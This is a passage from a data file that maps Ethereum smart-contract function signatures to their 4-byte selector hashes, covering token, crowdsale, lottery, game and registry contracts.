"getSourceConstraint(uint256,uint256,uint256)": "0x3ab5657d", "getDigitFromUint(uint256,uint256,uint8)": "0x0d8fbe23", "test_insert_findWithHintPrevUpdateTail()": "0x4bda3f2b", "getConfigUint(bytes32)": "0xf92bb8c9", "test_insert_findWithHintPrevAtPosition()": "0x1dfde4a5", "getUint8FromByte32(bytes32,uint8)": "0x4b42d208", "getUint()": "0x000267a4", "mintExtraTokens(uint256)": "0xeca5339d", "pointRootNode(address)": "0xdb606931", "awardPoint(bytes32)": "0x33f9942b", "checkPoint(uint8,int256,uint16)": "0xad4493fe", "doMint(uint256)": "0xa4a339ee", "getOuvidoriaEndpoint(address)": "0xf412af91", "test_mint()": "0x1e2fc4f7", "setUint8(uint8)": "0x1774e646", "isMinter(address)": "0xaa271e1a", "setMintTokenOwner(address,address)": "0x2eafb9fa", "getUint8()": "0x343a875d", "mintTokens(address,uint256,uint256)": "0x6831e272", "testFailMintGuyNoAuth()": "0x8a213adb", "intMemoryArray()": "0x99bc826e", "delMinter(address)": "0x23338b88", "mintForDisputeCrowdsourcer(uint256)": "0xb6bf1b3a", "isPoint(uint256,uint256)": "0x1340d09a", "mintWithEvent(address,uint256)": "0x114da3e3", "print(uint256)": "0x6bb0ae10", "mintGreen(address,uint256)": "0xff48fd9c", "mint(address,uint256,bytes)": "0x94d008ef", "getUint(address,string)": "0xca4cbf67", "test_insert_findWithHintNextRemovedUpdateTail()": "0xcf58fbeb", "test_insert_findWithHintNextUpdateTail()": "0xc1a85e16", "getProposalUint(uint256)": "0x69de374d", "test_insert_findWithHintNextUpdateHead()": "0xac833fd9", "mint(bytes32,bytes,uint256[],bytes,bytes)": "0xe64e3241", "mintTokens(uint256,address,address)": "0x6407e432", "killMeshPoint(address,address,string,address)": "0x39e8bd48", "doMint(address,uint256)": "0x1fa30523", "test_oneValidEqBytesUint()": "0x2596e62c", "mint(address,uint256,bool)": "0xd1a1beb4", "testFail_mint_without_add_authority_to_controller()": "0xe7a3c218", "mintRep(address,uint256)": "0x8b9e2832", "mintToken(address,uint256,address)": "0x6dfada86", "extractUint(bytes,uint256,uint256)": "0xf4ce66e0", "mint(uint256)": "0xa0712d68", "setUint(bytes32,string,uint256)": "0xeadf9760", "UrlHint()": "0xf5eb2313", "unmint(uint256)": "0x64e779b1", "getDataPoint(uint256,uint256)": "0xb70f6ea8", "test_insert_findWithHint()": "0x1b011bd9", "mintAll()": "0x595882b3", "mintTokens2(address,uint256,uint256)": "0xae81f51b", "_mint(uint256,uint256,uint256)": "0x63f1a089", "removeGlobalConstraint(address,int256,address)": "0xf7aeea14", "test_oneValidEqStringUint()": "0x1f7e3e72", "MintableToken(uint256)": "0x9e306d32", "mintParticularPart(uint8[4],address)": "0xf3794914", "demintTokens(address,uint8)": "0xe7f4037a", "reserveFullMintAllowance()": "0xd592f5fd", "intFunc(int256,int256)": "0x84f1cdb7", "setMintAddress(address)": "0xfab37154", "MintAuthority(address)": "0x5084b2a3", "test_insert_findWithHintPrevRemovedUpdateHead()": "0x3799c5eb", "testMint()": "0x9642ddaf", "getConfigUint(bytes)": "0xf0b087c5", "setMeterPoint(address,int256)": "0xc2da621b", "addressInArray(address)": "0xb68d1d4d", "addressLength(address)": "0x3a089d17", "get_king_address()": "0xbcd5078c", "addressOf(bytes32)": "0xbb34534c", "token_address()": "0x8c8e8fee", "setstoredaddress(address)": "0x2776b163", "set_sale_address(address)": "0xf2bee03d", "addressToBytes(address)": "0xded8454a", "addressFunc(address)": "0x683cecc2", "addressToUser(address)": "0xedf53886", "client_address()": "0x4bf4e421", "addressToPersonId(address)": "0xc76e7f32", "id_for_address(address)": "0x743438ad", "_addressNotNull(address)": "0x3d695002", "_address(uint256)": "0x6825c843", "calluseraddress(address)": "0xe1d10f79", "addressAndBalance()": "0x6d2381b3", "addressCallWithArray(address[3])": "0xd261fbed", "setCBaddress(address,address)": "0xb34244e8", "addressOf(string)": "0xccf1454a", "addressPayableFunc(address)": "0x33bd8036", "addressChangeBlock()": "0x7c02e1ea", "addressVerified(string)": "0xc4dddedd", "get_address(string)": "0x6ba44d3c", "callstoredaddress()": "0xd24b08cc", "weiToOwner(address,address,uint256)": "0x8e5051f0", "changeEtsAddress(address)": "0xccb00344", "UNEK()": "0x41d45f4a", "getAllAddresses()": "0x9516a104", "getCrystalsByKind(address,uint256)": "0xb78ae50a", "getCrystals(address)": "0x876cf0ef", "getCrystalsSummary(address)": "0x17ca1a6d", "getCrystal(uint256)": "0x9c2f7a43", "getBalanceEth()": "0x9caf34c4", "balanceOfEthFee()": "0x3ed08dc9", "balanceOfToken(address,address)": "0xf59e38b7", "transferFee()": "0xacb2ad6f", "payEth(address,uint256,uint256)": "0x8a7c2be2", "payToken(address,address,uint256,uint256)": "0xf64ccca6", "setFeeAccountToken(address)": "0x2cb0de18", "setFeeAccount2(address)": "0xe7b89977", "setFeeAccount1(address)": "0xbc0aca61", "getCurrencyPayment(address,uint256)": "0x98445e6f", "getValuePayment(address,uint256)": "0x3b8ea9e7", "getSellerAddressPayment(address,uint256)": "0x1987e50c", "getBuyerAddressPayment(address,uint256)": "0x23146c20", "withdrawEther(address)": "0xaf933b57", "setAllowedContract(address,address)": "0x76466d42", "changeSaleAddress(address)": "0x184bd394", "privateSale(address,uint256)": "0xd50a3d2c", "sale(address,uint256)": "0x611efc09", "Yumerium()": "0x4868ab47", "Bitcoin()": "0xa23b791a", "SpartaTeamCoin()": "0xb76c8a2c", "Worldcoin1()": "0xefb20f6a", "doPurchase()": "0x9f856de5", "MindToken()": "0x1fda4271", "registerDINs(uint256)": "0x516ed622", "registerDIN()": "0x1196245b", "updated(uint256)": "0xbbfad256", "setResolver(uint256,address)": "0xbc7b6d62", "resolver(uint256)": "0x108eaa4e", "setOwner(uint256,address)": "0x7fd39247", "owner(uint256)": "0xa123c33e", "DINRegistry(uint256)": "0x8a8672dc", "UnvestedSkyeCrypto(uint256,string,string)": "0xd7533751", "KUNTEStandardToken(uint256,string,uint8,string)": "0xfbb5f682", "BTCEarth()": "0x7278d080", "Hydro()": "0x5a079207", "UnicornToken(address)": "0xdc5bcafb", "_getFreezeTime(uint8)": "0x9c5e108c", "getUnicornGenByte(uint256,uint256,bytes1)": "0xf5e3394f", "fromHexChar(uint8)": "0x2ecb20d3", "burnUnicorn(uint256)": "0x089922b5", "removeUnicorn(address,uint256)": "0x0a15a07f", "addUnicorn(address,uint256)": "0x394a0926", "UnicornAccessControl(address)": "0xd8058712", "sendInternally(address,uint256,uint256)": "0xe0e4c438", "sendTokensSingleValue(address[],uint256)": "0x54919a6c", "sendTokens(address[],uint256[])": "0xd8b66ae1", "AirDrop()": "0x939c0a66", "TokenFactoryAirdropToken()": "0x40acbee3", "STAEtoken()": "0x8beac22d", "Applicationcoin()": "0x9258c8f8", "CbdStandardToken(uint256,string,uint8,string)": "0xe12a894e", "charityAmtToCharity(address)": "0x4369a2c2", "lossToCharity(uint256,address)": "0xed02dded", "USER_GET_PRIZE()": "0xfe213712", "USER_GAME_WITH_TOKEN(uint256)": "0xe223facb", "ethTransfer(address,uint256)": "0x4f95a04b", "itgTokenTransfer(uint256,bool)": "0x3f0b70b6", "USER_VOTE(uint256,uint256)": "0x6997d166", "USER_GET_CROWDSALE_TOKEN()": "0x0335d533", "ITGToken()": "0x18e37cdd", "distributeTokenSale(uint256,uint256,uint256,uint256)": "0x945c7c59", "charityAmtToCharity()": "0xd45294f5", "lossToCharity(uint256)": "0xf2141ab9", "PointGameParticipate(address,uint256,uint256)": "0x3d124c9d", "PointGameWithITG(address,uint256)": "0xb4cd3701", "PointGameProcess(address,uint256)": "0x9399dcfb", "getPrize(address)": "0x2d5cd1d6", "selectWinner(uint256)": "0x4c524be4", "gcFundAmount()": "0xf13c9b2b", "refreshGameTime()": "0x1c982066", "getTimeRangeInfo()": "0x5ae23f84", "RangeGameWithITG(address,uint256)": "0x454431c1", "RangeGameProcess(address,uint256)": "0xb398924d", "processWithITG(address,uint256)": "0xfc0ea853", "setRangeGameAttr(uint256,uint256,uint256)": "0x290a9fa0", "vote(address,uint256,uint256,uint256)": "0xfedfe46c", "voteInitiate(uint256,uint256,uint256,uint256,uint256,uint256)": "0x72159335", "getToken(address)": "0x59770438", "process(address,uint256)": "0x7562b0cf", "setAttrCustom(uint256,uint256,uint256,uint256)": "0xe2d7a7c0", "setAttrs(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x23ff2af0", "setExecutor(address)": "0x1c3c0ea8", "Zemana()": "0x0bf867c2", "PharmaWit()": "0xce9ae667", "retrieveEth(uint256)": "0xdf5f0603", "redeemTokens(bytes32)": "0x1fa3c372", "NEToken(address,uint256,uint256,uint256)": "0xf643cf3d", "AidEvaCoin()": "0xf9616bfa", "importPlayers(address,address[])": "0x4e989a5b", "UnilotBonusTailEther(address)": "0x0b8ba87d", "UnilotTailEther(uint256,address)": "0x534104df", "bet2deltaOf(uint256)": "0xbb472c93", "bet1deltaOf(uint256)": "0x694a813f", "bet2Of(uint256)": "0x8d3d523b", "bet1Of(uint256)": "0xccadd6b1", "witnessOf(uint256)": "0xbd9ef436", "nextPrice2Of(uint256)": "0x180f8f4f", "nextPrice1Of(uint256)": "0x02ba302b", "free2Of(uint256)": "0xd17ab3c6", "free1Of(uint256)": "0xb11408b7", "price2Of(uint256)": "0x98f31c82", "price1Of(uint256)": "0xe88885fa", "owner2Of(uint256)": "0x43574d9e", "owner1Of(uint256)": "0x1e7ae71f", "buy2(uint256)": "0xfb0c0782", "buy1(uint256)": "0xb59a1d37", "cryptoChallenge()": "0xf5ece00a", "Send(address[],uint256[])": "0x2d08d408", "MultiSend()": "0x0e620d70", "EtheremonDataEvent(address)": "0x1b36cbfc", "withdrawTo(address,address,uint256)": "0xc3b35a7e", "depositFor(address,address,uint256)": "0xb3db428b", "overflow(address)": "0xa3a183c1", "withdrawOverflow(address)": "0x3a30452a", "unsetERC777(address)": "0x900888a3", "setERC777(address)": "0x2670bdf0", "isOperatorFor(address,address)": "0xd95b6371", "granularity()": "0x556f0dc7", "isSpender(address)": "0x9a206ece", "latestSpender()": "0x6f362c2b", "removeSpender(address)": "0x8ce5877c", "addSpender(address)": "0xe7e31e7a", "transfer(address,address,address,uint256)": "0xf18d03cc", "TRSToken()": "0x0f710616", "WSIPrivateEquityShare()": "0xe86a3b8b", "ENBToken()": "0xfd8b09c2", "Ethershares()": "0x9f943039", "_bytes32ToString(bytes32)": "0xad966a03", "getElementInfo(uint256)": "0x9584894c", "getElementInfoView(uint256)": "0x9738b602", "getElements(uint256[])": "0x630c010e", "getElement(uint256)": "0x3a7d22bc", "getElementView(uint256)": "0x70d0cc86", "getElementOwners(uint256[])": "0x3a98c533", "getElementsFromIndex(uint32,uint32)": "0xc037d9ce", "addElements(bytes32[])": "0x128952e4", "addElement(bytes32)": "0x3440465e", "ChemistryCore()": "0xaa59fb7d", "nextPriceOfElement(uint256)": "0x2864ddde", "priceOfElements(uint256[])": "0x6b8fd600", "priceOfElement(uint256)": "0x03c49580", "_calculateOwnerCut(uint256)": "0x7e2ce380", "_ownerApproved(address,uint256)": "0x5175f65c", "_createElement(bytes32,uint256)": "0x8872bb2a", "YoobaBatchTransfer()": "0x101ca1b9", "ThreeDL()": "0x974317dc", "safeSubtr3DL(uint256,uint256)": "0x8bea6a39", "_createDrink(string,address,uint256)": "0x6530b7f9", "secondsAfterStart()": "0xbcd59b36", "getDrink(uint256)": "0x1f32c18f", "createManyDrinks()": "0x85f2d854", "createOneDrink(string)": "0xd2758538", "payoutFromContract()": "0x9eec4bac", "CETACEA(address)": "0x9979b7aa", "lockAddress(address,uint256)": "0x3328bd24", "mintTokensBatch(uint256,address[])": "0x6d6908bd", "ElectroneumGold()": "0x7c170237", "retrieveTokens(uint256)": "0x09f29d1b", "testFunded(uint256)": "0x7b144a84", "testExchangeRate(uint256)": "0xb87b9ac3", "crowdSale()": "0x7770bd15", "EPCToken(string,string,string)": "0x39673345", "proposeOwner(address)": "0xb5ed298a", "setConfiguration(uint256)": "0x0ad40df1", "initLottery(uint256,uint256,uint256,uint256)": "0x4e390f2a", "requestAllowance()": "0x60795d80", "allowsAllowance()": "0x3a375a92", "LotteryAdmin(address)": "0xbb7fe5c9", "initLottery(uint256,uint256,uint256)": "0xb91bb31c", "PitisCoin()": "0xed33fba7", "CONNECT(uint256,string,string)": "0x194a7adc", "setIsHiddenMessages(bool)": "0xe6adde32", "craetePartnerBytes(address,address)": "0x5384602d", "getOwnPartnerMessage(uint256)": "0x589737fb", "partnerMessagesCount(address,address)": "0xe958d15f", "getPartnerMessage(address,address,uint256)": "0xb7b57c3f", "getPartner(address)": "0xd50f6d3a", "getPropose(address)": "0xe8ac0e76", "farewellTo(address)": "0x6e415d37", "cancelProposeTo()": "0xef9c4446", "proposeTo(address)": "0x88b4b861", "setTokenTransferState(bool)": "0xa186e120", "tranferPresaleTokens(address,uint256)": "0x448f1ec1", "EpsBonus()": "0xe30dd27a", "generate(string,address,address,bytes32,uint256,uint256)": "0x8a107a31", "buy_sale()": "0x47a42ff7", "Equio(string,address,address,bytes32,uint256,uint256)": "0x7d09f560", "PPCContract()": "0x89805fc6", "Platopay()": "0xda16241b", "TEMTicket(address,uint256,uint256)": "0xb1816f60", "determinePlayer(bytes32[],bytes32[],int256[],uint8,bytes32,bytes32)": "0x1b477633", "TEAM_ALLOWANCE()": "0xc429e4a3", "reservationAddress()": "0x1fa4ea66", "ownerCommission()": "0x118934cc", "WHOLESALE_TOKENS()": "0x0ddc4a94", "totalUnclaimedBidsAmount()": "0x21981514", "pauseUET()": "0xbeac4bc3", "CELLS_TO_MAKE_1_SPERM()": "0xee60bfd0", "TOKEN_DECIMAL()": "0x0cb6b577", "StabilizationFund()": "0x5cc18780", "updateLatestSaleState()": "0x6508978b", "TMEXAddressSet()": "0x5a06f1e3", "releasedTokenTotal()": "0x8d3121b3", "poolWeight()": "0x971fe56b", "TOKEN_SHARE_OF_TEAM()": "0x9584fbfc", "maxLockDuration()": "0xa16cdbb1", "tokenGNO()": "0xf0cafe0e", "withdrawalOwner()": "0x163f9b4f", "token_airdrop_amount_each()": "0xe97f6313", "carCount()": "0x297a1f56", "vc1Wallet4Pct()": "0x66005ede", "minimumDifficultyThresholdWei()": "0x22b2f178", "minimalTokens()": "0x5ac2523a", "minimumTakerProtocolFee()": "0x28a8ee68", "tstart()": "0x77337d37", "startlistUploaded()": "0xee7203b8", "get_presale_goal()": "0x960d94bb", "loveStoriesCount()": "0x800362ae", "RETAINED_TOKENS()": "0xc1640913", "proposalContract()": "0x3aef3900", "commandTookAway()": "0x15020cb0", "countryTimeLock()": "0x650d22e8", "secondStageRaisedInWei()": "0x08555a0a", "soldCoins()": "0xa3fcafb9", "maxTextLength()": "0x379e00d4", "icoBonus()": "0x27018631", "returnToSender()": "0xdb171211", "saveMe()": "0xf1e50ce9", "presalesCap()": "0x49e9449a", "transactionRequestCore()": "0xb64eecb1", "newFoundationCandidate()": "0x9d64a5e5", "Contents()": "0x6a07089f", "ethBioxRate1()": "0xe01567cf", "FAPFundDeposit4()": "0xeb3d032d", "mintTokensForServices()": "0xf54cc2d0", "loseGame()": "0x00d52342", "tokenBonusForFirst()": "0x9423719b", "nextCheckpoint()": "0xeb680744", "MATCHES_PER_ROUND()": "0xf89f74bf", "whatDidJasonSay()": "0xe9ac5918", "startPreSale1()": "0x0dd5db48", "nVotesCast()": "0x023e36d8", "checksOn()": "0x8b6d6f1d", "openRound()": "0xe562dfd9", "totalAccounts()": "0x58451f97", "teamAmounts()": "0x1e92a65c", "closeWormhole()": "0xd8592d79", "remainingPublicSupply()": "0x10042e10", "tpe()": "0xfd600408", "msgsender()": "0x61c99b92", "isIcoFinalized()": "0x7728579a", "walletPlatform()": "0x7f86f7f4", "totalWinAmount()": "0xf7ead092", "Token_Remaining()": "0x3fbc6345", "total_iou_available()": "0x8c7d3241", "STARTING_FAIRY()": "0xf6644c5a", "EVEN()": "0x48700c7c", "newBonus_and_newPeriod()": "0x49b1b2d9", "cityPoolTotal()": "0x20c381af", "whitelistManagerAddr()": "0x6ee8067f", "periodITO_tokenPriceUSD()": "0xbab58ec9", "makeTradable()": "0xb1b68fad", "BlocksToGo()": "0x94bc7df4", "SUBMISSIONREWARD()": "0x3218ebcc", "oraclizeMinCallbackGasPrice()": "0xca6ad198", "User_4()": "0xeaeb83a2", "purchaseNo()": "0x2807eece", "getEthereum()": "0x2ebc4293", "deploytime()": "0x521fbd3a", "potatoOwner()": "0xc02898a0", "highestBet()": "0x836826a6", "powerDayEthPerPerson()": "0x9abb9e78", "functionSignatures()": "0x49d0cd85", "queryNow()": "0xe076c0ae", "withdraw_3Completed()": "0xecda58c2", "transactionfeeAmount()": "0x8e77d147", "Partial8Send()": "0x3667551c", "sentTokensToCompany()": "0x405710a8", "erc223Activated()": "0x3664b12d", "ALLOC_SALE_GENERAL()": "0x2d27c8cd", "numberOfWhitelists()": "0x34523cbc", "Start5()": "0xc9aa013b", "secondTime()": "0x499caf09", "RAISED_AMOUNT()": "0x0533f57b", "oldCratesSold()": "0xff044add", "receivedWeiMin()": "0x6a5b459c", "blackListActive()": "0xa0c567a2", "currentSeason()": "0xbcb39621", "Police_5()": "0x14b49c36", "maxInvestments()": "0x0add0baa", "timeOneSession()": "0xfa607442", "create_event(string)": "0x11af07e2", "EtherCash1()": "0x80e52f31", "withdrawThetokens(address)": "0x43aefca0", "GuDuFengCoin(uint256,string,uint8,string)": "0xe61a3c73", "DolyToken3()": "0xa2657960", "transferToInvester()": "0xea6c9750", "readyForFinish()": "0xdaf1db09", "isMainsalePeriod()": "0xa775511a", "_transferWallet(address)": "0xdcf86587", "batchWhitelistAddresses(address[])": "0x2957d848", "isAddressWhitelist(address,address)": "0x5162b2b2", "ETTToken()": "0x2e558a2d", "MuMuToken(uint256,string,string)": "0xb5352fa7", "upgradeFinalize()": "0x79d2e48d", "upgradeStart(address)": "0xfaf3d174", "publishMixerType(bytes32)": "0xf6648d4c", "confSetupMixer(bytes32,uint256,uint256,uint256,uint256)": "0x9c536640", "assertBalance()": "0xb57d5d27", "keyImageUsedUpdate(uint256[2])": "0xfd790923", "getMixerTypes()": "0x47f2748a", "getMixerCountByType(bytes32)": "0x031f273c", "getMixerInfo(bytes32,uint256)": "0x76d57ad3", "getMixer(bytes32,uint256)": "0xd83cb681", "getMixParticipantByPubKey(uint256)": "0x62c4c89e", "getMixParticipantIdByAddress(bytes32,uint256,address,address)": "0x4165295a", "getDepositReceipts(address,int256,uint8)": "0xac656636", "getBalanceDiscrepancy()": "0x8639b0d7", "calculatePayout(bytes32)": "0x18d84553", "getPubKeyArr(bytes32,uint256,uint256[])": "0xd9fc8026", "cancelDeposit(bytes32,uint256,uint256)": "0x2a388b1f", "deposit(bytes32,uint256,uint256)": "0x278f2ab8", "MixManager()": "0xd42ed758", "rsVerifyPoint(uint256,uint256)": "0x47c8771c", "addPeers(address[])": "0x1e7e2064", "tradeWalletTokens(address,uint256)": "0x0e64ff0e", "makeInvestment(uint256)": "0xba3eefc5", "launchInvestment(uint256)": "0xe7ac4df8", "getDistributionAt(uint256)": "0xbbf7585c", "getExchangeGroupsLength()": "0xd571edb0", "getExchangeGroupsKeyAt(uint256)": "0x9709cdbc", "Delineto()": "0x2e7a26d6", "mybalance(address)": "0x3c306250", "checkProblemsSolved()": "0x6559c08d", "solveProblem(uint256)": "0x905bebe9", "submitProblem(uint256)": "0x76bd4d2d", "subLoan(address,uint256)": "0x09999404", "signLoan(address)": "0xf57db6e1", "loanBalanceOf(address)": "0x9ead1b00", "sendEth(address)": "0x76a54c60", "Chally()": "0xd405d6f4", "BitPrize()": "0x28f3ebd6", "MARRON()": "0x2ae9782c", "GitBitToken()": "0xf61f019d", "getTransferHash(address,address,uint256,uint256,uint256)": "0x954f3b20", "EcRecover(bytes32,bytes)": "0x33132860", "MyEPPToken()": "0x13e3151b", "getEntry(uint256,uint256)": "0x98ba676d", "getPastGameResults(uint256)": "0x3efb537e", "getTeamCost(uint256)": "0x87f7e2a1", "getPoolValue(uint256)": "0x94a80dd9", "getNumEntries(uint256)": "0x2a38d484", "getTopPlayers(uint256)": "0xba3c0067", "getTopPlayerScores(uint256)": "0xc5c2f6e0", "getAllPlayers(uint256)": "0xac01b83d", "getTeamScore(uint256)": "0x75aa39bd", "getCutoffTime(uint256)": "0x295e3362", "getGameNumberOfEntries(uint256)": "0xd678724f", "getAvailableWinnings(address,address)": "0xada4c022", "assignWinnings(uint256)": "0xec1e4861", "generateWinners(uint256)": "0x213f9ad4", "registerTopPlayers(uint256,uint256[],uint256[])": "0x0657a9c5", "registerTeamScores(uint256[])": "0xe7d86204", "createEntry(uint256,uint256[])": "0xd8a3daa0", "changeAvailableSpend(uint256)": "0x78ecabe6", "changeTeamCosts(uint256[])": "0x5c77582f", "changeMaxEntries(uint256)": "0xba454d60", "changeEntryFee(uint256)": "0xf7d978a2", "getNumParticipants(uint256)": "0x78dfd3a9", "Buckcoin()": "0xdebc94ff", "VitaminToken(uint256,string,string)": "0x36f54767", "JustEscrowTestCoin()": "0xe7a25bfc", "NewContent(string)": "0xff74e915", "PakEKO()": "0x3250e151", "KaoPuToken(address,uint256)": "0x62150b3f", "fechAllCandidates()": "0xb0ded9ce", "TwistoToken()": "0x87e0f794", "TOU(uint256,string,uint8,string)": "0x9293cc10", "BitDailyBot()": "0xdb89edb2", "PORNO()": "0xee588b69", "refundBond(uint256)": "0x59c55429", "_refundBond(uint256,address)": "0x228e554a", "getNumOfLotto()": "0x98dd0baa", "checkWinner()": "0xad38867e", "drawBookLotto()": "0x4fca329a", "buyBookLotto()": "0x728a6755", "ScareERC20Token()": "0x79a411ff", "RTPToken()": "0x41bcd712", "L19_PALToken()": "0x1308e82d", "dorcasToken()": "0xcdc26dcb", "XiongDiLianToken(address,address)": "0xadb67c41", "CrowdSale_ModifyEndDate(uint256)": "0xc7f300ed", "calcprice()": "0x2e01783d", "mintContract(address,uint256)": "0x56c3e31a", "Manual_Mint(address,uint256)": "0xa9d2d87c", "getBattleCardsInfo(uint256)": "0x436fdc0e", "getCardsInfo(uint256)": "0xdeec4c20", "upgradeIdRange()": "0x709e6ed4", "unitPLATCost(uint256)": "0xfbe45b48", "unitBattlePLATCost(uint256)": "0xb6206e67", "unitBattleEthCost(uint256)": "0x2df56bb2", "unitEthCost(uint256)": "0xee9cebde", "getWeakenedDefensePower(uint256)": "0x94b67b1c", "getCostForUprade(uint256,uint256,uint256)": "0x14d9d2e5", "getCostForBattleCards(uint256,uint256,uint256)": "0xa8aeecd9", "CreateUpgradeCards(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x2d78737b", "CreateCards(uint256,uint256,uint256,uint256,uint256,bool)": "0xb3082d25", "CreateBattleCards(uint256,uint256,uint256,uint256,uint256,uint256,uint256,bool)": "0xe2a9bb53", "getPLATPrice()": "0x06201ad9", "setPLATPrice(uint256)": "0xe968e1ec", "setMaxCAP(uint256)": "0x2b2449b5", "setAllowedAddress(address,address)": "0x8985a309", "GameConfig()": "0x14423381", "IMCOToken()": "0x8d12aba7", "MCC()": "0x28ed5c0d", "getPatentFee(address,uint16[5])": "0xd617ad7d", "synthesize(uint16[5])": "0xa2890972", "Ektcoin(uint256,uint256)": "0xffb58247", "getBytes32(uint256)": "0x24dfc9d7", "getKeccak256(uint256)": "0xb1c73525", "getDoubleKeccak256(uint256)": "0x1add6bcf", "ZeenCoin()": "0xaaac205b", "validatePurchase()": "0x04c98a2a", "DocnotaPresale(address,address)": "0xfca2efd5", "distributeSRNT(address[],uint256)": "0x1a1a0d65", "SERENITY()": "0xe96b5e13", "PennyEther()": "0xd67772d3", "setUpgrader(address)": "0x1b878f71", "allowUpgrading(bool)": "0xca1b5aa7", "upgradeFrom(address,address,uint256)": "0x4c6c6a5c", "upgradeFor(address,uint256)": "0x829ebdcd", "Nudge()": "0xad44c205", "GetItems(address)": "0x54c0775f", "SetItem(address,uint256,address)": "0x3e441ef4", "AddItem(address,address)": "0x2ab4ebfa", "CheckTree(address)": "0x9af6489d", "mintFromTrustedContract(address,uint256)": "0x8da76874", "setTrustedMinterAddr(address)": "0x70e0bd61", "finishPrivateSale()": "0xdcfe63a9", "balancePrivateSale()": "0x11ec7b4a", "removeReinforcedWhitelist(address[])": "0x106c6441", "removeBaseWhitelist(address[])": "0x80999b71", "addReinforcedWhitelist(address[])": "0xffbd26ce", "addBaseWhitelist(address[])": "0x1552cb04", "setWhitelister(address)": "0xf98f5b92", "LevelWhitelistedIICO(uint256,uint256,uint256,uint256,uint256,address,uint256)": "0x68bee793", "valuationAndCutOff()": "0x47ab58ec", "totalContrib(address)": "0x5e7c85b1", "bonus()": "0x75b4d78c", "search(uint256,uint256)": "0xc68ee9cd", "searchAndBid(uint256,uint256)": "0xce160edd", "submitBid(uint256,uint256)": "0xb821da1b", "IICO(uint256,uint256,uint256,uint256,uint256,address)": "0x368e85ff", "EthereumVerge()": "0x7f66ccbe", "ownerKill()": "0x8d702122", "ChangeEnd(uint256)": "0xf72f6826", "ChangeStart(uint256)": "0x0e78501f", "ChangeCost(uint256)": "0xc47af5cf", "WithdrawTokens(uint256)": "0x162bc80c", "WithdrawAllETH()": "0x29a5c0f4", "WithdrawETH(uint256)": "0x94effa14", "BCOExtendedToken(address,string,string,uint256,uint256)": "0xfb2004f2", "Cryptshopper()": "0xe42c04f4", "setDividendsDistributor(address)": "0x1808c6b6", "distributeDividendsOnTransferFrom(address,address,uint256)": "0x9890eabe", "totalPaidDividends()": "0x44fe2eb0", "totalDistributedDividends()": "0x42e5b9f1", "totalUndistributedDividends()": "0xad80a7b4", "onApprove(address,address,uint256,uint256)": "0xec8f4d04", "NPToken()": "0x405353b5", "ZLCC()": "0xadc1463a", "setAddrContractCaller(address)": "0x36945328", "getRemainShareAmountInternal(address)": "0x614be0c4", "getRemainShareAmount()": "0x0e0e26da", "isLocked(address)": "0x4a4fbeec", "setAgentRate(address,uint256)": "0x46758d0b", "setAccountShareRuleGroupId(address,uint256)": "0x07e1967a", "tokenShareShow(address)": "0x86fa0671", "updateShareRuleGroup(uint256,uint256,uint256,uint256,uint256)": "0x66f928d3", "initPublicityAddr()": "0x9bd6a4de", "initShareRule4Publicity()": "0xd2599312", "initIcoRule()": "0x0e5aaace", "getIcoAddrListByIcoRuleId(uint256,uint256)": "0x03e6c117", "getIcoAddrCount(uint256)": "0x97172664", "getIcoRuleList()": "0x57d70c0b", "icoRuleCancel(uint256)": "0xc08e05aa", "icoPushAddr(uint256,address)": "0x99b58f06", "icoRuleUpdate(uint256,uint256,uint256,uint256,uint256)": "0xc0c8821a", "icoRuleAdd(uint256,uint256,uint256,uint256)": "0xdb23c5d7", "parse2wei(uint256)": "0x826446fa", "delAdmin(address)": "0x62d91855", "getMiniPoolEdit_1()": "0x017b39a7", "setMiniPoolEdit_1(string)": "0x340867a0", "MiniPoolEdit_2()": "0x2fcd410a", "COINVR()": "0xd5005c35", "LTHToken()": "0xefc77f3f", "YUNLAI()": "0x3c2698d5", "initalize(uint256)": "0x99eb6603", "GalacticX(uint256,string,string)": "0x3b116370", "MIAMIcoin()": "0x1d71929d", "updateStandard(bytes4,bytes4)": "0xc22f8250", "token_escape(address)": "0xd035e45f", "ecrecoverFromSig(bytes32,bytes)": "0xd4acaf6c", "getSignHash(bytes32)": "0xb15aa5b7", "recoverPreSigned(bytes,bytes4,address,uint256,bytes,uint256,uint256)": "0x09ea63e3", "getPreSignedHash(bytes4,address,uint256,bytes,uint256,uint256)": "0xa9a0b495", "recoverRevokeHash(bytes,bytes,uint256)": "0xe269f929", "getRevokeHash(bytes,uint256)": "0xd4d64f2b", "revokeSignaturePreSigned(bytes,bytes,uint256)": "0xe391a7c4", "approveAndCallPreSigned(bytes,address,uint256,bytes,uint256,uint256)": "0xc8d4b389", "myWallets()": "0xd263be48", "createWallet(address,address)": "0x8f860c5f", "TinaCoin()": "0xdde05a67", "BrazilvsCostaRica()": "0x6fa88aa3", "SubajToken()": "0x5e8aedce", "depositTokens()": "0x7c4b414d", "EMACCrowdsale(uint256,uint256,uint256,address,address)": "0x4dfd14b2", "transferPaymentAddress(address)": "0x1d91bd9f", "DiamondToken(string,string,uint8,uint256)": "0x15eff89b", "NAMO()": "0xc02b5395", "CCXTokenERC20(uint256,string,string)": "0x032eb997", "adminUpdateSettings(address,address)": "0xea5136a1", "TokenPaymentGateway()": "0x06eb6ac1", "PPY(uint256,string,string)": "0x7d4f0406", "RakugoCrowdsale(uint256,uint256,address,address,address[])": "0x19c85a4d", "RakugoPresale(uint256,uint256,uint256,address)": "0x46340b37", "mintAuthorizedBatchWithBalances(address[],uint256[])": "0x1c0c3d33", "mintAuthorizedBatch(address[],uint256[])": "0xa5d6d4c3", "mintBatch(address[],uint256[])": "0x7c88e3d9", "setStopContract(bool)": "0x66161ed4", "LBL(uint256,string,string)": "0xcf27539e", "TravelToken()": "0x45c654eb", "startSale(uint256,uint256,uint256,uint256,uint256,address)": "0x4f07b5f0", "ConpayToken()": "0x8e438b70", "Touch()": "0x18477799", "resetListing(bytes32)": "0xa03f633a", "whitelistApplication(bytes32)": "0x45ce86eb", "determineReward(uint256)": "0xc8187cf1", "challengeExists(bytes32)": "0x1b7bbecb", "appWasMade(bytes32)": "0x8cf8151f", "isWhitelisted(bytes32)": "0x01a5e3fe", "canBeWhitelisted(bytes32)": "0x691a38ab", "updateStatus(bytes32)": "0x8a59eb56", "challenge(bytes32,string)": "0x43cffefe", "exit(bytes32)": "0x0ca36263", "withdraw(bytes32,uint256)": "0x040cf020", "deposit(bytes32,uint256)": "0x1de26e16", "apply(bytes32,uint256,string)": "0x89bb55c7", 